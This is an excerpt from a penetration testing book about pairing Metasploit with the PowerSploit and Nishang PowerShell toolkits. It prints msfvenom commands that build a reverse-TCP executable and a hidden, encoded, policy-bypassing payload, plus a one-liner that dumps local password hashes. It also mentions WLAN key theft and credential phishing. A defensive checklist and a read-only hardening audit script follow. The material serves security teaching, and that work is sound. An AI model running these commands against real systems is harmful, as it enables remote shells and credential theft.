
PowerShell is a powerful tool for performing sophisticated attacks, and it can also be used side by side with the Metasploit Framework.

This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.

In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination opens the door to more customized attacks and security tests.

Interactive PowerShell

PowerShell-based modules are already integrated into Metasploit. You can list them with the search command from the msfconsole prompt:

msf > search powershell

Now it is time to learn how to use Metasploit with PowerShell. As a demonstration of one of the many uses, you can wrap a PowerShell payload or script in an executable file using the msfvenom utility (the bracketed placeholder is where the encoded script would go):

msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [Powershell script Here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe

PowerSploit

PowerSploit is a well-known collection of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, clone it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit

After cloning the project, use the ls command to list the files.

From the directory listing, you can see that PowerSploit contains a number of scripts grouped by task, such as:

  • AntivirusBypass
  • Exfiltration
  • Persistence
  • PowerSploit
  • PowerUp
  • PowerView

Nishang – PowerShell for penetration testing

Nishang is a collection of PowerShell scripts and payloads used throughout the phases of a penetration test. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang

As you can see from listing the downloaded project, Nishang is loaded with scripts and utilities for many of the tasks required during a penetration testing engagement, such as:

  • Privilege escalation
  • Scanning
  • Pivoting

You can explore all the available scripts by listing the content of the Nishang project with the ls command. Let's try some of Nishang's scripts on a Windows machine.

You can import all the modules using the Import-Module PowerShell cmdlet.

If the import fails, don't worry: before you can use Import-Module on these scripts, you need to open PowerShell as an administrator and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned. Then you can import the modules.

Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information.

If you want to unveil WLAN keys, type Get-WLAN-Keys.

You can go further and dump password hashes from a target machine in a post-exploitation mission. The Get-PassHashes module dumps the local password hashes; the book shows its output on the author's local machine.

If you want to run the command from a shell you have already obtained, use the following one-liner (the original used a comma between the two commands, which PowerShell would read as a second module name; a semicolon separates them):

Powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"

You can even perform a phishing attack using Invoke-CredentialPhish, in the same way as the previous demonstration, by running it on the victim's machine.

Defending against PowerShell attacks

In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

  1. Run the latest PowerShell version (version 5, when this book was written). To check the installed version, type Get-Host.
  2. Monitor PowerShell logs.
  3. Enforce a least-privilege policy and the relevant group policy settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker.
  4. Use Constrained Language mode:
     PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
  5. To check that Constrained Language mode is active, type:
     $ExecutionContext.SessionState.LanguageMode
     That way, malicious scripts that rely on the full language won't work.
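The following script is an added example, not part of the book or of any of the projects above. It turns the checklist into an audit that reports the PowerShell version, the language mode, the __PSLockdownPolicy setting, whether script block, module and transcription logging are enabled by Group Policy, and the latest script block log events (Event ID 4104) that the monitoring step depends on. The function name is our own; the registry paths are the documented policy locations and nothing is modified.

```powershell
# Added example (not from the book): audit a host's PowerShell hardening state.
# It checks the version, language mode and __PSLockdownPolicy discussed above,
# whether script block, module and transcription logging are enabled by policy,
# and pulls the latest script block log events (Event ID 4104) for monitoring.
# Run from an elevated PowerShell session. Registry paths are the documented
# Group Policy locations; nothing here modifies the machine.
function Get-PowerShellHardeningReport {
    [CmdletBinding()]
    param([int]$RecentEvents = 5)

    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $envKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'

    # Read a DWORD policy value; an absent key or value counts as "not enabled".
    function Read-PolicyValue([string]$SubKey, [string]$Name) {
        $item = Get-ItemProperty -Path (Join-Path $policyRoot $SubKey) -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { return 0 }
        return [int]$item.$Name
    }

    # Machine-scope environment variables live in this registry key.
    $lockdown = (Get-ItemProperty -Path $envKey -Name '__PSLockdownPolicy' -ErrorAction SilentlyContinue).__PSLockdownPolicy

    $report = [ordered]@{
        PSVersion          = $PSVersionTable.PSVersion.ToString()
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
        PSLockdownPolicy   = if ($lockdown) { $lockdown } else { '(not set)' }
        ScriptBlockLogging = (Read-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (Read-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription      = (Read-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1
    }

    # Flag the weak settings the checklist above warns about.
    $findings = @()
    if ($PSVersionTable.PSVersion.Major -lt 5) { $findings += 'PowerShell older than version 5: upgrade.' }
    if ($report.LanguageMode -ne 'ConstrainedLanguage') { $findings += 'Constrained Language mode is not active.' }
    if (-not $report.ScriptBlockLogging) { $findings += 'Script block logging (Event ID 4104) is not enabled by policy.' }
    if (-not $report.ModuleLogging) { $findings += 'Module logging is not enabled by policy.' }
    $report.Findings = if ($findings) { $findings } else { @('No findings.') }

    # Most recent script block events from the PowerShell operational log, if any exist.
    $report.RecentScriptBlocks = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $RecentEvents -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'Snippet'; e = { $m = [string]$_.Message; $m.Substring(0, [Math]::Min(120, $m.Length)) } }

    return [pscustomobject]$report
}

Get-PowerShellHardeningReport | Format-List
```

Run it once before and once after applying the checklist: the Findings entry should empty out, and RecentScriptBlocks should start filling with 4104 events once script block logging is on.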

In this article, we saw how Metasploit and PowerShell can be combined to perform more customized attacks and security tests, and what to put in place to defend against them. If you've enjoyed reading this post and want to learn how to exploit enterprise VLANs, going from theory to real-world experience, check out Advanced Infrastructure Penetration Testing.
